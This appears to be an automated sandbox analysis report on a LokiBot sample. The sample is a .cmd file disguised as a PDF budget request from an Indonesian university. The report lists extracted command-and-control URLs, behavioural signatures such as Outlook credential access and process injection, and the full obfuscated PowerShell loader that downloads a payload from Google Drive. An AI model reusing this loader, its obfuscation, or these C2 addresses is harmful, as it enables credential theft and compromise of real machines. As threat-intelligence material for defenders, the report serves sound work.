Analysis
-
max time kernel
141s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-10-2024 07:56
Static task
static1
Behavioral task
behavioral1
Sample
PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.cmd
Resource
win7-20240903-en
General
-
Target
PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.cmd
-
Size
6KB
-
MD5
854644dfd3e32033434d0338404c9a8f
-
SHA1
f693fd34cef102901ebf389fd346e4e27fcbac2f
-
SHA256
09a3bb4be0a502684bd37135a9e2cbaa3ea0140a208af680f7019811b37d28d6
-
SHA512
9b5d79c99bf7d6d4ceaae0729c8036536a4514ebf19e40cf7e3870bf47346228c0ae1d025974a6adf4407501fad7e3edec7d0076474f2690c88c3a59b812fec6
-
SSDEEP
192:rO2ENM8I0pZCaTFhv8YvBsYtFHkbaBuvl0MzT+L9XNZ:8XI0CaTFl8kB3kbD1XIdZ
Malware Config
Extracted
lokibot
http://137.184.191.215/index.php/check.php?s=am9ntjjw
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 5 2300 powershell.exe 7 2300 powershell.exe 9 3044 msiexec.exe 11 3044 msiexec.exe 13 3044 msiexec.exe 15 3044 msiexec.exe 16 3044 msiexec.exe 17 3044 msiexec.exe 18 3044 msiexec.exe 19 3044 msiexec.exe 26 3044 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2300 powershell.exe 2848 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 drive.google.com 5 drive.google.com 9 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3044 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2848 powershell.exe 3044 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2300 powershell.exe 2848 powershell.exe 2848 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 3044 msiexec.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3000 wrote to memory of 2300 3000 cmd.exe 31 PID 3000 wrote to memory of 2300 3000 cmd.exe 31 PID 3000 wrote to memory of 2300 3000 cmd.exe 31 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 PID 2848 wrote to memory of 3044 2848 powershell.exe 37 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook msiexec.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "<#Fracturable Hirsuties Rumoring #>;$Ligningsafdelings='Foresprgselsskema';<#Afspndingsvelserne Mobcaps Crucis eroderendes Meditant Lavishment Analyseresultater #>;$Dodding=$host.PrivateData;If ($Dodding) {$Vidneforklaringer++;}function japaconin($tostavede){$Bossa=$Tvetydige+$tostavede.Length-$Vidneforklaringer; for( $Destabiliseringen73=5;$Destabiliseringen73 -lt $Bossa;$Destabiliseringen73+=6){$Afsendendes='Overexercising';$Vrdigheden+=$tostavede[$Destabiliseringen73];}$Vrdigheden;}function Undangered($Egernets){ & ($Cystocarcinoma) ($Egernets);}$Kollektivisering=japaconin 'Gru,pM.reseoRedenzKon uiTrut l Tvrbln nexaSalgs/Brev,5Fj rv.Antik0 Bete athi(PabulWBrugeiHushenShebadSleepoLungew DannsStor AcceN CallTUnfre Popul1Gratt0Plans. Star0Korsf;Tet,a TiktaWPulediAppronB.jle6Grall4 .anv;Insoo Dragox ska,6e.isk4Wind ; Spot GuldtrSa lyvBl st: Myop1Fiche2Optur1L,str.Tauto0 Folk) ygep LictoGPrciseArbe.cVsenskKnop.otilbe/P ima2Steno0Hansa1Parfo0Shaha0Actin1Taktr0 Oran1 Rets Pr emFCuddei L arrCarapeCarg f u,mao Ste,xungr /R.med1Agtso2Exper1Super.Coccy0Spell ';$Bestignings186=japaconin 'OvervUF rmssBirtaEDemonRHospi- Br rASlkniGDrivkeBr.chNUnavaTLambr ';$Pathogermic=japaconin ' DonahDynejtMu ettI hthpSt mtsUnl.n: ,ova/Kalli/UdpebdCatchrAreaeiDelirvRendeeUnif..UnobjgOpspooIntroo Ste,gAmidolStor e Flle.TilggcAfmaaoMiniamAzole/ TalluPlacecA ske? nulle evasxUnfirpTrykioViderr ,adit Lopp=dumpedBa kaoSurtawnonconHeadll .doroRadi aRu,kodritua&LandbiHusmadrudet= Pagr1 Afl,M egioc T atRAktiedPi etJudlgsuGaarea OppoSVagt WhalmsnGr ntP .ugt4,kyggLPeavi6Hens.uSkriv-Men.sMRelo TSolkuaFeltflNa nevPigenx denrDRespeJ SkemIM noehTem oyRut.cWddfdtTAnd.oxH drobSchisrSm ap ';$Urologis=japaconin 'Flage>Dit i ';$Cystocarcinoma=japaconin 'SofapiJ.rdaEQui qx Kont ';$Lignocellulosic='Rigsdaler';$Pawnages='\Klinkerne66.Syn';Undangered (japaconin ' Smmo$delikgForrelPungeo F.rbbHejseasimpllDagdr:DownwGOverspAarssaHeelpdAtomv=Bro.s$ParteeT rcenBiotivSmaas: Ste aLs btpOve hpunsumd L.eraM thrtTrappaHarmo+Irise$Fre sPNonscaEcon,w DevanMas iaPrimagAfv.neReallsO slu ');Undangered (japaconin 'Etape$ LuthgRetsll A tioAfmnsbEnk laBe zolMiste: AgtsF.anocaFiberiSextil SurdiNectanBlegegRkkerlDazz.ySuper=Micro$OracuPKro eaTu tltN ttehSy.meoSerpeg.kabeeS ovbrCiga m odeliudla cExcus. WondsFar.ipMirf,lBismai UdmatSubma(Gir l$SkilnUTa etrOve.to De al SanioG bligConspi NazisTranq)Delgh ');Undangered (japaconin ' Hid [ProflN Ketye eleptAion .O spoSAnimaeBistrrZooecvForspiLappec Ple e TiaaPSpeciobrikeiS,aghnPagantBib lMArteraAds.rnMelloaKongeg etume Nea.rMisdo]Trskr:Coffl: rhopSbenpieBenedcS miju Nyvar H.psiUndert.belayMaterP .sycrNonheoGassetLaskeo DomkcMaskioKrimilGoodi Un,er= Ofre Belem[Disn N rboreEkspet,uper.BlindSKangae MaalcPacifuFl shrNas.oiPretetphorayanstiP disnrBlackoBrah.tKogleo Sextc Stofo sc elMegapTEcd sy Oratp InteeLesot]Tilen:Un da:CurlyTAmortlAfdamsGrafi1 Hys.2 Horn ');$Pathogermic=$Failingly[0];$salerno=(japaconin 'Blaar$ romoGBirdeL FragO Noneb LeptaPibleLLifeb:AriadP KlasR IritOUntaccbombahNiogtRUnsadofug,eM.jaltO ThymSnonstO NedpMProleE.aabe=He,opn OffeE BrndwSvan -Pro roMaterBPolynjbr nceCommoCKas utDefil SkibssMinesYResprsver,iTTri,heu jagMDetai. Hyphn Boree FrimtS att. Une WTriviebungeb UndecPr.uslChi iiRepatEU brinBetnktChapp ');Undangered ($salerno);Undangered (japaconin 'Vddel$Div.sPOplagr fennoOutsccResk,h Va erTullio ddimMa.rooR tinsBr atoBeklam CurreHelle.DelelHCathoewifisa phobd ogeaeSamstrSacchs Land[ Oste$ OpspBForsleBeredsSy.dit EkslibrissgProg nTetaniM.sdenJvnfrgSnowdsEr.ta1Klatt8Hensy6Domes] inte= Udri$PrediK TornoNuphal PanilIngraeCostiksygedtStivei pbakv gbakihlernsPho,oeObrazrNonasiBoblenvisumgLfteb ');$Retfrden=japaconin 'Nulvk$ DrmaPDriftrRevero EpercDer ahUnd.rrli,pioDoorcmprothoZik,usStunkoUforhmHold,e span.ButikD SkuloRomanwKom,onVaeggl BaadoLitteaPeri dproptFFo,aniPagnelAfledeEnjam(Lovpr$ExpecPTeletaFeltht AttehInvesoImbolgMannae .ullr FlocmSigneiklassc Spec,Tauro$ piriSstewauSmertbKomp.c Senal nogtaPerfes FressStiftiN.nthf RevaiTintecDenisaMegaftVol aiInforoBaandnSlant)Overs ';$Subclassification=$Gpad;Undangered (japaconin 'Malac$ Nut GPruttLFoli,oO.knaBRibosADeflaLKhotm:S ormM,atenaC yxsRPler,iAnv nAFirsaND adlaAand = Henv(ForsoTFolkeeKursuSDeconTAnt p- WhispEskadaBarduT FalsH impl Dagho$kyllis SproUsk.ttBkurtic,ubsil H.raaAvlensUnneuS ,yesiDeporFBedraiForkoCFaconaretarT OmeniJu,eso FrilNUnbea)Feni, ');while (!$Mariana) {Undangered (japaconin ' Exsa$Sekt,gcoupelD rtho.rinobChor aUu.dglRett :KonstN Li.neTercemPro omMatade Ag,esHepat=Udyrt$CaonatBhlanrRinc uFortaeUdste ') ;Undangered $Retfrden;Undangered (japaconin ' VuerSAn.abtAfprea ellerNondet lide-SkeltSHerpelRaadee rangeAvnslpBlanc Reuss4Rampe ');Undangered (japaconin ' buxe$F.gmagLnpotlSkovsoDio ab uno aSacrolFemte:OvervM Ba.raSto mrIotasi P ofaJuta.nOversaDemol= ngio(UdkasT Rubreelastslede tCorop-LiderP DeoxaBandltFl rehEquis Appen$ Ba rSUnevouFrtekb ChamcAlloclOpva,aFuldrsEarthsTapa.iAndalfH stiiU osmcS,aniasem pt St liElasmoKausan,egne)Stear ') ;Undangered (japaconin ' Gali$SpeakgTottelvo.dsoFor.lb B,gka.pparlCayub: HundSFour.pKoncir Benai orkn Gardt,hemieGrimarGr sseLogopnArraksProg =Whe t$DiatogUdadglTons oEfterbTe,neaJo sllBusti:DesalBAmenda.ondirMegalyTu getarvoio SkulnMikroeStt.v+T stg+Afgif%Lito.$PackwFOut aaAud.tiA taclHel aiTrmasnMonotgVi enlsigniyUp ti.ba iscDanskoLeptous rivnIm ert,euda ') ;$Pathogermic=$Failingly[$Sprinterens];}$Ebonits=320275;$Autoradiogram=30210;Undangered (japaconin 'Frifi$ amowgWitsvlCedunopo sobNgsteac edilStakt:M lesmBrsteaBrevsgUnv na raqusHardciDvrgfnLodbreImprerLngdenu meeeNetsm Semim=Se,ue EddeG InteeLun.ntOu fo-CoralCKons,oExon nph setmiaoueVo itn SkattReac, erie$end.gSSomnauOpga bHumo c Co.olR slaaAeonis Stu sL.keriFremhf Uddei,iraccAffotaAutoctGe neiCoaxaoFalisnTask ');Undangered (japaconin 'sha o$Jur tgnonpelGlittoSoeskbDampra oldelSmall:Cath WForfliAp,rilNa nil KludiStatsneksp gJarrisMercu Longs=Nonsp Kajep[AmmioS Reh,yEp.sus,anontreg le Coitm .ict. BuffC ,oruoGaffen FordvKloakePointrKonfitin ea]Rhin :Smoul: SubvF.emocrHarleoblomsmAminoBForteaDougisLimniePauci6epuli4TiltuSFoulat St rr B,chiUndernTermigSenus(Brac $TankbmSemita nthgZephya C,shsheteriProc nDeigneTr isr ompanBereleDewed)Munda ');Undangered (japaconin 'Opsig$Sh erg PopulNaupao verrbGte.la Tolkl.euko:.eaneEPretruMidsorP risifolkedStolpyLoulocPenise.ssen Beehi=Lgebe G nla[Ba rsS NybryNonapsRetsktWea,ae GalsmMissi.NonspTRotfme AncyxRewrat Swal.EkstrESclernContrcFaareo ValgdGabriiKakapnNotesgNauru]Zocco: arsh:SwadeAYoungSOccipCin,omI StorI Civ . ManoG ForueSh pmtB.utiSAns rtFil tr Sko i Sa,vnB.mahgSangf(Salsd$Bums WJobnaiSlutbl WhitlUnderi LeginDim sgRemigs affl)Super ');Undangered (japaconin 'Fisk $Pacemg,ubpelRump oWestfbForgraOutrelFrekv:slaaefUnq,aj TaklrFakultVundne rawndOverpeUnfo.sHunke=Indis$StudeEUdst,uSttterUafhniRodsad ottySe,iecMar he Harm. KardsInt nuTinfobSmuglsLi petelegirOmdiriNon nn latig Ruc (Retfr$VerdiEroe tbTurnao SjlenElecti,orsatfete,sClow ,Laval$ApartA PekeuW,enitGastroudfrtrUnidoa etald Finmi BelloRddikg At mrBygniaNi hem der) Arbe ');Undangered $fjrtedes;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Fracturable Hirsuties Rumoring #>;$Ligningsafdelings='Foresprgselsskema';<#Afspndingsvelserne Mobcaps Crucis eroderendes Meditant Lavishment Analyseresultater #>;$Dodding=$host.PrivateData;If ($Dodding) {$Vidneforklaringer++;}function japaconin($tostavede){$Bossa=$Tvetydige+$tostavede.Length-$Vidneforklaringer; for( $Destabiliseringen73=5;$Destabiliseringen73 -lt $Bossa;$Destabiliseringen73+=6){$Afsendendes='Overexercising';$Vrdigheden+=$tostavede[$Destabiliseringen73];}$Vrdigheden;}function Undangered($Egernets){ & ($Cystocarcinoma) ($Egernets);}$Kollektivisering=japaconin 'Gru,pM.reseoRedenzKon uiTrut l Tvrbln nexaSalgs/Brev,5Fj rv.Antik0 Bete athi(PabulWBrugeiHushenShebadSleepoLungew DannsStor AcceN CallTUnfre Popul1Gratt0Plans. Star0Korsf;Tet,a TiktaWPulediAppronB.jle6Grall4 .anv;Insoo Dragox ska,6e.isk4Wind ; Spot GuldtrSa lyvBl st: Myop1Fiche2Optur1L,str.Tauto0 Folk) ygep LictoGPrciseArbe.cVsenskKnop.otilbe/P ima2Steno0Hansa1Parfo0Shaha0Actin1Taktr0 Oran1 Rets Pr emFCuddei L arrCarapeCarg f u,mao Ste,xungr /R.med1Agtso2Exper1Super.Coccy0Spell ';$Bestignings186=japaconin 'OvervUF rmssBirtaEDemonRHospi- Br rASlkniGDrivkeBr.chNUnavaTLambr ';$Pathogermic=japaconin ' DonahDynejtMu ettI hthpSt mtsUnl.n: ,ova/Kalli/UdpebdCatchrAreaeiDelirvRendeeUnif..UnobjgOpspooIntroo Ste,gAmidolStor e Flle.TilggcAfmaaoMiniamAzole/ TalluPlacecA ske? nulle evasxUnfirpTrykioViderr ,adit Lopp=dumpedBa kaoSurtawnonconHeadll .doroRadi aRu,kodritua&LandbiHusmadrudet= Pagr1 Afl,M egioc T atRAktiedPi etJudlgsuGaarea OppoSVagt WhalmsnGr ntP .ugt4,kyggLPeavi6Hens.uSkriv-Men.sMRelo TSolkuaFeltflNa nevPigenx denrDRespeJ SkemIM noehTem oyRut.cWddfdtTAnd.oxH drobSchisrSm ap ';$Urologis=japaconin 'Flage>Dit i ';$Cystocarcinoma=japaconin 'SofapiJ.rdaEQui qx Kont ';$Lignocellulosic='Rigsdaler';$Pawnages='\Klinkerne66.Syn';Undangered (japaconin ' Smmo$delikgForrelPungeo F.rbbHejseasimpllDagdr:DownwGOverspAarssaHeelpdAtomv=Bro.s$ParteeT rcenBiotivSmaas: Ste aLs btpOve hpunsumd L.eraM thrtTrappaHarmo+Irise$Fre sPNonscaEcon,w DevanMas iaPrimagAfv.neReallsO slu ');Undangered (japaconin 'Etape$ LuthgRetsll A tioAfmnsbEnk laBe zolMiste: AgtsF.anocaFiberiSextil SurdiNectanBlegegRkkerlDazz.ySuper=Micro$OracuPKro eaTu tltN ttehSy.meoSerpeg.kabeeS ovbrCiga m odeliudla cExcus. WondsFar.ipMirf,lBismai UdmatSubma(Gir l$SkilnUTa etrOve.to De al SanioG bligConspi NazisTranq)Delgh ');Undangered (japaconin ' Hid [ProflN Ketye eleptAion .O spoSAnimaeBistrrZooecvForspiLappec Ple e TiaaPSpeciobrikeiS,aghnPagantBib lMArteraAds.rnMelloaKongeg etume Nea.rMisdo]Trskr:Coffl: rhopSbenpieBenedcS miju Nyvar H.psiUndert.belayMaterP .sycrNonheoGassetLaskeo DomkcMaskioKrimilGoodi Un,er= Ofre Belem[Disn N rboreEkspet,uper.BlindSKangae MaalcPacifuFl shrNas.oiPretetphorayanstiP disnrBlackoBrah.tKogleo Sextc Stofo sc elMegapTEcd sy Oratp InteeLesot]Tilen:Un da:CurlyTAmortlAfdamsGrafi1 Hys.2 Horn ');$Pathogermic=$Failingly[0];$salerno=(japaconin 'Blaar$ romoGBirdeL FragO Noneb LeptaPibleLLifeb:AriadP KlasR IritOUntaccbombahNiogtRUnsadofug,eM.jaltO ThymSnonstO NedpMProleE.aabe=He,opn OffeE BrndwSvan -Pro roMaterBPolynjbr nceCommoCKas utDefil SkibssMinesYResprsver,iTTri,heu jagMDetai. Hyphn Boree FrimtS att. Une WTriviebungeb UndecPr.uslChi iiRepatEU brinBetnktChapp ');Undangered ($salerno);Undangered (japaconin 'Vddel$Div.sPOplagr fennoOutsccResk,h Va erTullio ddimMa.rooR tinsBr atoBeklam CurreHelle.DelelHCathoewifisa phobd ogeaeSamstrSacchs Land[ Oste$ OpspBForsleBeredsSy.dit EkslibrissgProg nTetaniM.sdenJvnfrgSnowdsEr.ta1Klatt8Hensy6Domes] inte= Udri$PrediK TornoNuphal PanilIngraeCostiksygedtStivei pbakv gbakihlernsPho,oeObrazrNonasiBoblenvisumgLfteb ');$Retfrden=japaconin 'Nulvk$ DrmaPDriftrRevero EpercDer ahUnd.rrli,pioDoorcmprothoZik,usStunkoUforhmHold,e span.ButikD SkuloRomanwKom,onVaeggl BaadoLitteaPeri dproptFFo,aniPagnelAfledeEnjam(Lovpr$ExpecPTeletaFeltht AttehInvesoImbolgMannae .ullr FlocmSigneiklassc Spec,Tauro$ piriSstewauSmertbKomp.c Senal nogtaPerfes FressStiftiN.nthf RevaiTintecDenisaMegaftVol aiInforoBaandnSlant)Overs ';$Subclassification=$Gpad;Undangered (japaconin 'Malac$ Nut GPruttLFoli,oO.knaBRibosADeflaLKhotm:S ormM,atenaC yxsRPler,iAnv nAFirsaND adlaAand = Henv(ForsoTFolkeeKursuSDeconTAnt p- WhispEskadaBarduT FalsH impl Dagho$kyllis SproUsk.ttBkurtic,ubsil H.raaAvlensUnneuS ,yesiDeporFBedraiForkoCFaconaretarT OmeniJu,eso FrilNUnbea)Feni, ');while (!$Mariana) {Undangered (japaconin ' Exsa$Sekt,gcoupelD rtho.rinobChor aUu.dglRett :KonstN Li.neTercemPro omMatade Ag,esHepat=Udyrt$CaonatBhlanrRinc uFortaeUdste ') ;Undangered $Retfrden;Undangered (japaconin ' VuerSAn.abtAfprea ellerNondet lide-SkeltSHerpelRaadee rangeAvnslpBlanc Reuss4Rampe ');Undangered (japaconin ' buxe$F.gmagLnpotlSkovsoDio ab uno aSacrolFemte:OvervM Ba.raSto mrIotasi P ofaJuta.nOversaDemol= ngio(UdkasT Rubreelastslede tCorop-LiderP DeoxaBandltFl rehEquis Appen$ Ba rSUnevouFrtekb ChamcAlloclOpva,aFuldrsEarthsTapa.iAndalfH stiiU osmcS,aniasem pt St liElasmoKausan,egne)Stear ') ;Undangered (japaconin ' Gali$SpeakgTottelvo.dsoFor.lb B,gka.pparlCayub: HundSFour.pKoncir Benai orkn Gardt,hemieGrimarGr sseLogopnArraksProg =Whe t$DiatogUdadglTons oEfterbTe,neaJo sllBusti:DesalBAmenda.ondirMegalyTu getarvoio SkulnMikroeStt.v+T stg+Afgif%Lito.$PackwFOut aaAud.tiA taclHel aiTrmasnMonotgVi enlsigniyUp ti.ba iscDanskoLeptous rivnIm ert,euda ') ;$Pathogermic=$Failingly[$Sprinterens];}$Ebonits=320275;$Autoradiogram=30210;Undangered (japaconin 'Frifi$ amowgWitsvlCedunopo sobNgsteac edilStakt:M lesmBrsteaBrevsgUnv na raqusHardciDvrgfnLodbreImprerLngdenu meeeNetsm Semim=Se,ue EddeG InteeLun.ntOu fo-CoralCKons,oExon nph setmiaoueVo itn SkattReac, erie$end.gSSomnauOpga bHumo c Co.olR slaaAeonis Stu sL.keriFremhf Uddei,iraccAffotaAutoctGe neiCoaxaoFalisnTask ');Undangered (japaconin 'sha o$Jur tgnonpelGlittoSoeskbDampra oldelSmall:Cath WForfliAp,rilNa nil KludiStatsneksp gJarrisMercu Longs=Nonsp Kajep[AmmioS Reh,yEp.sus,anontreg le Coitm .ict. BuffC ,oruoGaffen FordvKloakePointrKonfitin ea]Rhin :Smoul: SubvF.emocrHarleoblomsmAminoBForteaDougisLimniePauci6epuli4TiltuSFoulat St rr B,chiUndernTermigSenus(Brac $TankbmSemita nthgZephya C,shsheteriProc nDeigneTr isr ompanBereleDewed)Munda ');Undangered (japaconin 'Opsig$Sh erg PopulNaupao verrbGte.la Tolkl.euko:.eaneEPretruMidsorP risifolkedStolpyLoulocPenise.ssen Beehi=Lgebe G nla[Ba rsS NybryNonapsRetsktWea,ae GalsmMissi.NonspTRotfme AncyxRewrat Swal.EkstrESclernContrcFaareo ValgdGabriiKakapnNotesgNauru]Zocco: arsh:SwadeAYoungSOccipCin,omI StorI Civ . ManoG ForueSh pmtB.utiSAns rtFil tr Sko i Sa,vnB.mahgSangf(Salsd$Bums WJobnaiSlutbl WhitlUnderi LeginDim sgRemigs affl)Super ');Undangered (japaconin 'Fisk $Pacemg,ubpelRump oWestfbForgraOutrelFrekv:slaaefUnq,aj TaklrFakultVundne rawndOverpeUnfo.sHunke=Indis$StudeEUdst,uSttterUafhniRodsad ottySe,iecMar he Harm. KardsInt nuTinfobSmuglsLi petelegirOmdiriNon nn latig Ruc (Retfr$VerdiEroe tbTurnao SjlenElecti,orsatfete,sClow ,Laval$ApartA PekeuW,enitGastroudfrtrUnidoa etald Finmi BelloRddikg At mrBygniaNi hem der) Arbe ');Undangered $fjrtedes;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\syswow64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3044
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
456KB
MD546d8386ae55aedb99c64364e7c99e8b0
SHA16962f68c2ad1faaef3b9f21e6c83cd2c6d9df148
SHA256b8083d232543db2f2ad140965d7599774276b6bac6e2a631ab53ea25ac6e8e16
SHA512bd07fbe31e85c59f6d395fdb22b9c43952373630a0c514689955bcc2e851e1be6633b2113db9bf02d848ba24a04fd8db5a6affafc55a8c390a4813d65536cb9f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WMUJNIKT86JGND1A3AC6.temp
Filesize7KB
MD5067aaceef5cad3ffc6ff6bac228133df
SHA1b52ddef2bc9612744dd706d81dddb5d7a53e5ec9
SHA256351fae4e5fedfcbe6632600c3efad201bfc5402163c249df3ddffc2d9adb0ff6
SHA512700138b25bdac80161c42e23dd18b1447e03db1d9aaeb615368e8199228a82c2346cada712c565bf8ac3786aaf1bdf15cdd8160bfebbd0ba3f88e396d43cd2d2